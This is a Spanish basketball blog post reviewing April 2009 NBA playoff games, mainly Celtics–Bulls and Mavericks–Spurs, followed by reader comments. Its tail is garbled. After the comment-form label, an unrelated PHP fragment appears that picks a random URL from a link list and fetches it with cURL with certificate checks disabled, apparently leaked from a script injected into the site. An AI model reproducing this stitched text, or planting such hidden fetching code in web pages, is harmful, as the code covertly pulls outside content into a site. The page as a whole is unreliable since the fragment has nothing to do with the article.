Playoffs (20/04/2009): Recuperando el pulso

21 de April de 2009 por TheDeerHunter

raythreebullsEra el partido más importante de la temporada para dos grandes. Y si son grandes es, precisamente, porque cuando se ven en verdaderos problemas es cuando más peligrosos resultan. El carácter de campeón es un grado.

No se puede decir que los Bulls hayan dejado escapar oportunidad alguna. Los Celtics también juegan. A Ray Allen el otro día le llovieron palos hasta en el carné de identidad tras su 1 de 12, hasta el punto de que algunos nos atrevimos a dudar de su consideración de superestrella. Ayer nos la dio en toda la boca: 30 puntos, 6 de 10 en triples incluido el de la victoria. Y no es la primera vez que el bueno de Ray reacciona así en el momento en el que muchos otros se hundirían. Mucho más mérito, si cabe. Pero no podemos hablar sólo de Allen para explicar la victoria. Excelente partido, otra vez, de Rajon Rondo, el auténtico pilar del equipo en esta eliminatoria. Gran partido de Davis y Perkins equilibrando los tableros, y solvente producción de Paul Pierce. Sólo con estos mimbres ya es audaz darles por muertos antes de tiempo.

Los Bulls no estuvieron nada mal y llevaron el partido al límite como ellos buscaban. Quizás ahora haya que decir que en un gran partido de los Celtics ellos estuvieron a un pelo de ganarles. Salmons y Brad Miller hicieron bastante mejor partido que el primero. Gordon estuvo imparable… pero Rose tan sólo estuvo correcto y Noah/Tyus Thomas no marcaron diferencias. Deberán estar al 100% para eliminar a los campeones, ya pueden hacerse a la idea.

tparkerEl otro choque sí nos genera más dudas de si los Mavericks lo dejaron todo en la cancha para rematar a los Spurs, aunque tampoco vamos a exigirles que les hagan un 0-2 a los de Popovic a estas alturas. Poco o nada se pareció al primer partido. Si la defensa de Carlisle controló bastante el otro día, anoche Parker les armó un cirio de muy señor mío. Si Howard se salió por todos lados, anoche le plantaron a Bowen haciendo lo que más sabe. Si la segunda línea de Mavs sorprendió, ayer se equilibraron bastante las cosas con un buen Gooden…

No es que seamos precisamente Nostradamus en nuestras predicciones… pero al menos parece que sí acertamos en que estas eliminatorias van a estar igualadas.

rajonrondoPREMIOS

MVP: Los triples redentores de Allen y la exhibición de un Parker que dercorchó la zona de los Mavs a su antojo fueron de lo más destacado de la noche. Pero el premio es para Rondo, que lideró a los campeones a un triunfo vital en ausencia de Garnett y con un Pierce entre lo discreto y lo vulgar. El base firmó un triple doble a lo grande, con 19 puntos, 16 asistencias y 12 rebotes, adornado además con 5 robos y un +17 de parcial con él en cancha.

El rookie: Rose estuvo a años luz de igualar su actuación del primer partido de la serie. Aun así, 10 puntos, 7 asistencias, 6 rebotes y 2 tapones fueron su bagaje anoche.

La sorpresa: Buen momento eligió Glen Davis para lograr su mejor marca anotadora como profesional. 26 puntos, con 12 de 21 en tiros de campo, 9 rebotes y un +20 en el apartado de +/-. Ya lo habría firmado Garnett.

La decepción: Poco o nada pueden hacer los Mavs cuando Nowitzki falla 11 de sus 14 tiros de campo. El alemán se quedó en 14 puntos (8 de ellos desde la línea de tiros libres), 6 rebotes y 3 asistencias en 39 minutos. Hará falta mucho más por su parte para derrotar a los Spurs.

bengordonEl mayor esfuerzo en vano: Para resumir la actuación de Ben Gordon anoche en Boston no hace falta más que el verbo ‘anotar’. No reboteó, no asistió, no recuperó balones ni los perdió. Pero anotó de todas las maneras posibles, incluyendo 6 triples, y se fue hasta los 42 puntos. Ray Allen tiene la culpa de que hoy aparezca en esta sección.

Y esta noche…

– A las 2.00, Detroit @ Cleveland. ¿Nos molestamos en analizar otra nueva paliza de los Cavs?

– A las 4.00, Rockets @ Portland. Los Blazers, ante el abismo de un 0-2, necesitan recuperar su competitividad como locales. Tal vez les baste con imaginar que delante no están los Rockets sino los Lakers…

– A las 4.30, Jazz @ Lakers. Lo anterior no es cierto, los Lakers no juegan contra los Jazz sino contra sí mismos, contra su superioridad y contra la tentación de dejarse ir a la espera de citas más exigentes.

Comenta

9 comentarios a esta entrada

  1. Gallis dice:
    #1

    Joder con Ray Allen!!!

    La verdad es que la eliminatoria entre Celtics y Bulls está siendo maravillosa…

      Citar

  2. Txusma dice:
    #2

    Ese Allen, tapándome la boca a base de calidad. En mi defensa argumento q ye dije q aún le quedan muchos partidos por ganar…
    En todo caso a puntito de ponerse los Bulls con un 0-2. Creo que, aun suponiendo una eliminatoria igualada, nadie se esperaba algo parecido.

      Citar

  3. El blog de la ÑBA dice:
    #3

    Cada día nos sorprende más “Big Baby”, con sus limitaciones pero lo bueno que es el jodío…

    El concurso de triples entre Gordon y Allen para recordar.

      Citar

  4. aro_pasado_no_newtoniano dice:
    #4

    Gran partidete de playoffs, con fínal de infarto.

    Discrepo en lo de que Noah y Thomas deben marcar diferencias, pero cuando no duermo suficiente, discrepo con más frecuencia.

    Recuerdo una secuencia de Rondo; rebote def, canasta, rebote def, tiro con fallo, rebote of, asistencia para triple RAy. (aquí debería decir jugón, pero el tio nunca me ha hecho demasiada gracia)

    Al descanso iban 57 SAn Antonio- No sé cuantos, pero no sé cuantos menos DAlllas,, y Parker llegaba 27 puntos. (aquí vale el mensaje del capítulo anterior)

      Citar

  5. aro_pasado_no_newtoniano dice:
    #5

    Gran partidete, el celebrado en Boston. En Texas lo mejor debe estar por venir.

      Citar

  6. sabas dice:
    #6

    Ayer preguntaban sobre como ver los partidos por TV, en teoria se pueden ver gratis por sistema p2p sin ser ilegal. Digo en teoria porque yo solo he conseguido ver canales de deportes chinos o japoneses, eso si con bastante buena calidad (soy negado para la informatica). Aqui dejo un par de direcciones para el que le interese:
    http://www.todobasket.com.ar/como-ver-partidos-de-la-nba-en-vivo-por-internetgratis/
    http://www.partidosendirecto.es/2008/04/futbol-gratis-en-directo.html

      Citar

  7. Fran Reyes dice:
    #7

    Tremendo el primer cuarto de Parker en el partido ante Dallas, dejando a los defensores como auténticos inútiles y entrando a la zona como Pedro por su casa.

    @ El Blog

    Realmente, no sé qué tiene Davis para firmar esos números aparte de un corpachón imponente y a primera vista poco trabajado. Realmente es un complemento ideal a Garnett, Powe y Perkins, dentro de lo que cabe más finos y defensivos.

      Citar

  8. UnderlocK dice:
    #8

    Parece ser que Powe se ha lesionado y se pierde lo que resta de playoffs.

      Citar

  9. Jabho dice:
    #9

    Pues yo vi a Boston al limite… a 120 puntos no ganaremos muchos más partidos.

    Habría que desactivar a Gordon, habría que recuperar aportación desde el banco, mejorar la defensa, los balones perdidos… en fin, que justo ahora no lo veo claro. Y para colmo parece que sin Powe el resto de Po.

    En el banco House podría recuperar ese tirito que ha exhibido en la regular, Moore a falta de Garnett y Powe algo debería aportar e incluso Marbury y Tony Allen… demasiado poco. Por otro lado Pierce aun no ha aparecido y es quizás lo único positivo que los demás están y no hay que dudar que el llegará.

    Viva, qtal el duelo Rondo vs Rose??? Y no digo que Rose no vaya a ser un jugadorazo mucho mejor que Rondo, pero ayer le dio un bañito a Rose y otro a Hinrich

    En fi, que ahora no lo veo. Sin Garnett ni Powe casi no tenemos jugeo interior, el banco está muy mal y la defensa ha desaparecido… mal camino. Toca encomendarse a Pierce aunque parece que no van a ser nuestros PO

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>